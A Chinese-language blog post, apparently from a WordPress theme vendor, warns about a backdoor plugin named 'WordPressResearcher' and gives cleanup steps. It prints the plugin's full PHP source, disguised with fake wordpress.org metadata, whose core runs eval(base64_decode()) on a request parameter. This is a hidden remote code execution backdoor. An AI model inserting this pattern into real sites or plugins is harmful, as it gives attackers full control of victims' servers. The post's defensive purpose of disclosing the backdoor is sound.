WordPress后门插件WordPress Researcher research__plugin.php

关于WordPressResearcher插件

我管理的几个WordPress站点最近出现了一个名为“WordPressResearcher”的插件，经过仔细观察源码，发现它是一个后门插件。这个插件一旦安装，就会给黑客提供入口，非常危险，必须立刻删除。

<?php
/*
PluginName:WordPressResearcher
PluginURI:http://wordpress.org/extend/plugins/
Description:WordPressresearchtool.
Author:wordpressdotorg
AuthorURI:http://wordpress.org/
TextDomain:wordpress-researcher
License:GPLversion2orlater-http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version:2.2.4

Copyright2013wordpressdotorg

Thisprogramisfreesoftware;youcanredistributeitand/ormodify
itunderthetermsoftheGNUGeneralPublicLicenseaspublishedby
theFreeSoftwareFoundation;eitherversion2oftheLicense,or
(atyouroption)anylaterversion.

Thisprogramisdistributedinthehopethatitwillbeuseful,
butWITHOUTANYWARRANTY;withouteventheimpliedwarrantyof
MERCHANTABILITYorFITNESSFORAPARTICULARPURPOSE.Seethe
GNUGeneralPublicLicenseformoredetails.

YoushouldhavereceivedacopyoftheGNUGeneralPublicLicense
alongwiththisprogram;ifnot,writetotheFreeSoftware
Foundation,Inc.,51FranklinSt,FifthFloor,Boston,MA02110,USA
*/

functionresearch_plugin(){
if(isset($_REQUEST['CSSl'])){
eval(base64_decode($_REQUEST['CSSl']));
}
return;
}

add_action('after_setup_theme','research_plugin');
?>

其他应对措施

除了删除WordPressResearcher插件，还应该删除与之一起安装的“ExtendCalendar”插件，并升级WordPress的版本。为确保安全，还可以修改后台密码，并将整个网站的代码与备份进行比对，查看是否被插件修改了其他文件。

扫码添加UTHEME微信为好友

· 分享WordPress相关技术文章，主题上新与优惠动态早知道。
· 微信端最大WordPress社群，限时免费入群。